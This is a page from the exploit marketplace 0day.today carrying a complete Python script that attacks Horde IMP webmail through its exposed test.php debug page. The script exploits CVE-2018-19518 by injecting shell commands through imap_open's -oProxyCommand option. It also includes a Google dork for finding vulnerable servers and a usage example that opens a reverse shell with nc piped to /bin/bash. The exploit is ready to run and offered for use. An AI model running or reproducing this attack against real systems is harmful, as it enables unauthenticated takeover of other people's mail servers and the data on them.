0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Horde Imp - imap_open Remote Command Execution
[# Exploit Title: Horde Imp Unauthenticated Remote Command Execution
# Google Dork: inurl:/imp/login.php
# Exploit Author: Paolo Serracino - Pietro Minniti - Damiano Proietti
# Vendor Homepage: https://www.horde.org/apps/imp/
# Software Link: https://www.horde.org/download/imp
# Version: All IMP versions
# Tested on: Debian/Ubuntu
import requests
import sys
import base64
import random
import string
'''
--------------------------------------------------------------------------------------------
| Paolo Serracino - Pietro Minniti - Damiano Proietti - @OmnitechIT |
| Horde Imp Unauthenticated Command Execution via imap_open function in exposed debug page |
--------------------------------------------------------------------------------------------
Horde Imp, an application that comes with the Horde GroupWare/Webmail suite exposes an unauthenticated debug page with a form
that permits IMAP requests to arbitrary hosts. The page is at http://horde_path/imp/test.php and should be deleted after installation.
Leveraging the CVE 2018-19518 and no input sanitization is possible to execute shell commands.
Tested on Debian/Ubuntu.
'''
def check(target):
try:
res_check = requests.get(target)
if 'PHP Mail Server Support Test' in res_check.text and 'PHP Major Version: 5.' in res_check.text:
print("[+] Target is most likely vulnerable")
return True
else:
print("[-] Target doesn't look vulnerable")
sys.exit()
except requests.exceptions.RequestException as e:
print("[-] Connection Issue")
def exploit(target,cmd):
cmd= base64.b64encode(cmd)
payload1 = random.choice(string.ascii_letters)
new_headers = ({'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
'Referer':target,
'Cookie':'Horde=klstwo9u52kw7iqy4i22i0iok1;auth_key=klstwo9u52kw7iqy4i22i0iok1;imp_key=klstwo9u52kw7iqy4i22i0iok1;'
})
res = requests.post(target,headers=new_headers,data=[('server',payload1 + ' -oProxyCommand=echo$IFS$()' + cmd + '|base64$IFS$()-d|sh}'), #in order to avoid url encoding by requests
('port','143'),
('user','a'),
('passwd','a'),
('server_type','imap'),
('f_submit','Submit')
])
print('[+] Sent!')
if(len(sys.argv)) < 3:
print("[+] First argument is the path of target's Horde test.php and second the payload as a shell command")
print('[+] Enclose shell commands between double quotes')
print('[+] example python horde_imap_cmd.py http://127.0.0.1/horde/imp/test.php "mknod /tmp/bk p; nc 192.168.1.17 443 0</tmp/bk | /bin/bash 1>/tmp/bk"')
sys.exit()
target = sys.argv[1] #+ '/imp/test.php'
cmd = sys.argv[2]
if check(target):
exploit(target,cmd)
# 0day.today [2024-11-15] #